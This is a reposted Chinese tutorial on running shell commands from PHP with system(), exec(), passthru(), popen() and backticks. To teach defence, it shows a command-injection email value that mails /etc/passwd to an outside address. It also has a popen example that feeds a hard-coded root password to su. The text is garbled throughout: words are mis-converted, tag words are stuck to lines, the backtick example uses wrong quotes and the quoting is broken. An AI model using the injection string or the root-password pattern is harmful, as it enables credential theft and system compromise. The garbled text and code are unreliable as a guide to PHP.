PHP 執行系統外部命令 system() exec() passthru()(轉)

PHP 執行系統外部命令 system() exec() passthru()php

區別:
system() 輸出並返回最後一行shell結果。
exec() 不輸出結果,返回最後一行shell結果,全部結果能夠保存到一個返回的數組裏面。
passthru() 只調用命令,把命令的運行結果原樣地直接輸出到標準輸出設備上。

相同點:均可以得到命令執行的狀態碼


demo:
//system('dir');
// exec ('dir');
// passthru ('dir');
// echo `dir`;

PHP做爲一種服務器端的腳本語言,象編寫簡單,或者是複雜的動態網頁這樣的任務,它徹底可以勝任。但事情不老是如此,有時爲了實現某個功能,必須藉助於操做系統的外部程序(或者稱之爲命令),這樣能夠作到事半功倍。 web

那麼,是否能夠在PHP腳本中調用外部命令呢?若是能,如何去作呢?有些什麼方面的顧慮呢?相信你看了本文後,確定可以回答這些問題了。shell

是否能夠?數據庫

答案是確定的。PHP和其它的程序設計語言同樣,徹底能夠在程序內調用外部命令,而且是很簡單的:只要用一個或幾個函數便可。數組

前提條件安全

因爲PHP基本是用於WEB程序開發的,因此安全性成了人們考慮的一個重要方面。因而PHP的設計者們給PHP加了一個門:安全模式。若是運行在安全模式下,那麼PHP腳本中將受到以下四個方面的限制:服務器

執行外部命令網絡

在打開文件時有些限制dom

鏈接MySQL數據庫函數

基於HTTP的認證

在 安全模式下,只有在特定目錄中的外部程序才能夠被執行,對其它程序的調用將被拒絕。這個目錄能夠在php.ini文件中用 safe_mode_exec_dir指令,或在編譯PHP是加上--with-exec-dir選項來指定,默認是 /usr/local/php/bin。

若是你調用一個應該能夠輸出結果的外部命令(意思是PHP腳本沒有錯誤),獲得的倒是一片空白,那麼極可能你的網管已經把PHP運行在安全模式下了。

如何作?

在PHP中調用外部命令,能夠用以下三種方法來實現:

1) 用PHP提供的專門函數

PHP提供共了3個專門的執行外部命令的函數:system(),exec(),passthru()。

system()

原型:string system (string command [, int return_var])

system()函數很其它語言中的差很少,它執行給定的命令,輸出和返回結果。第二個參數是可選的,用來獲得命令執行後的狀態碼。

例子:

system("/usr/local/bin/webalizer/webalizer");

?>

exec()

原型:string exec (string command [, string array [, int return_var]])

exec ()函數與system()相似,也執行給定的命令,但不輸出結果,而是返回結果的最後一行。雖然它只返回命令結果的最後一行,但用第二個參數array 能夠獲得完整的結果,方法是把結果逐行追加到array的結尾處。因此若是array不是空的,在調用以前最好用unset()最它清掉。只有指定了第二 個參數時,才能夠用第三個參數,用來取得命令執行的狀態碼。

例子:

exec("/bin/ls -l");

exec("/bin/ls -l", $res);

exec("/bin/ls -l", $res, $rc);

?>

passthru()

原型:void passthru (string command [, int return_var])

passthru ()只調用命令,不返回任何結果,但把命令的運行結果原樣地直接輸出到標準輸出設備上。因此passthru()函數常常用來調用象pbmplus (Unix下的一個處理圖片的工具,輸出二進制的原始圖片的流)這樣的程序。一樣它也能夠獲得命令執行的狀態碼。

例子:

header("Content-type: image/gif");

passthru("./ppmtogif hunte.ppm");

?>

2) 用popen()函數打開進程

上面的方法只能簡單地執行命令,卻不能與命令交互。但有些時候必須向命令輸入一些東西,如在增長Linux的系統用戶時,要調用su來把當前用戶換到root才行,而su命令必需要在命令行上輸入root的密碼。這種狀況下,用上面提到的方法顯然是不行的。

popen ()函數打開一個進程管道來執行給定的命令,返回一個文件句柄。既然返回的是一個文件句柄,那麼就能夠對它讀和寫了。在PHP3中,對這種句柄只能作單一 的操做模式,要麼寫,要麼讀;從PHP4開始,能夠同時讀和寫了。除非這個句柄是以一種模式(讀或寫)打開的,不然必須調用pclose()函數來關閉 它。

例子1:

$fp=popen("/bin/ls -l", "r");

?>

例子2(本例來自PHP中國聯盟網站http://www.phpx.com/show.php?d=col&i=51):

/* PHP中如何增長一個系統用戶

下面是一段例程,增長一個名字爲james的用戶,

root密碼是 verygood。僅供參考

*/

$sucommand = "su --login root --command";

$useradd = "useradd ";

$rootpasswd = "verygood";

$user = "james";

$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);

$fp = @popen($user_add,"w");

@fputs($fp,$rootpasswd);

@pclose($fp);

?>

3) 用反撇號(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面)

這個方法之前沒有納入PHP的文檔,是做爲一個祕技存在的。方法很簡單,用兩個反撇號把要執行的命令括起來做爲一個表達式,這個表達式的值就是命令執行的結果。如:

$res='/bin/ls -l';

echo '
'.$res.'
';

?>

這個腳本的輸出就象:

hunte.gif

hunte.ppm

jpg.htm

jpg.jpg

passthru.php

要考慮些什麼?

要考慮兩個問題:安全性和超時。

先 看安全性。好比,你有一家小型的網上商店,因此能夠出售的產品列表放在一個文件中。你編寫了一個有表單的HTML文件,讓你的用戶輸入他們的EMAIL地 址,而後把這個產品列表發給他們。假設你沒有使用PHP的mail()函數(或者從未據說過),你就調用Linux/Unix系統的mail程序來發送這 個文件。程序就象這樣:

system("mail $to < products.txt");

echo "咱們的產品目錄已經發送到你的信箱:$to";

?>

用這段代碼,通常的用戶不會產生什麼危險,但實際上存在着很是大的安全漏洞。若是有個惡意的用戶輸入了這樣一個EMAIL地址:

'--bla ; mail someone@domain.com < /etc/passwd ;'

那麼這條命令最終變成:

'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'

我相信,不管哪一個網絡管理人員見到這樣的命令,都會嚇出一身冷汗來。

幸 好,PHP爲咱們提供了兩個函數:EscapeShellCmd()和EscapeShellArg()。函數EscapeShellCmd把一個字符串 中全部可能瞞過Shell而去執行另一個命令的字符轉義。這些字符在Shell中是有特殊含義的,象分號(),重定向(>)和從文件讀入 (<)等。函數EscapeShellArg是用來處理命令的參數的。它在給定的字符串兩邊加上單引號,並把字符串中的單引號轉義,這樣這個字符串 就能夠安全地做爲命令的參數。

再來看看超時問題。若是要執行的命令要花費很長的時間,那麼應該把這個命令放到系統的後臺去運 行。但在默認狀況下,象system()等函數要等到這個命令運行完才返回(其實是要等命令的輸出結果),這確定會引發PHP腳本的超時。解決的辦法是 把命令的輸出重定向到另一個文件或流中,如:

system("/usr/local/bin/order_proc > /tmp/null &");

?>

相關文章
相關標籤/搜索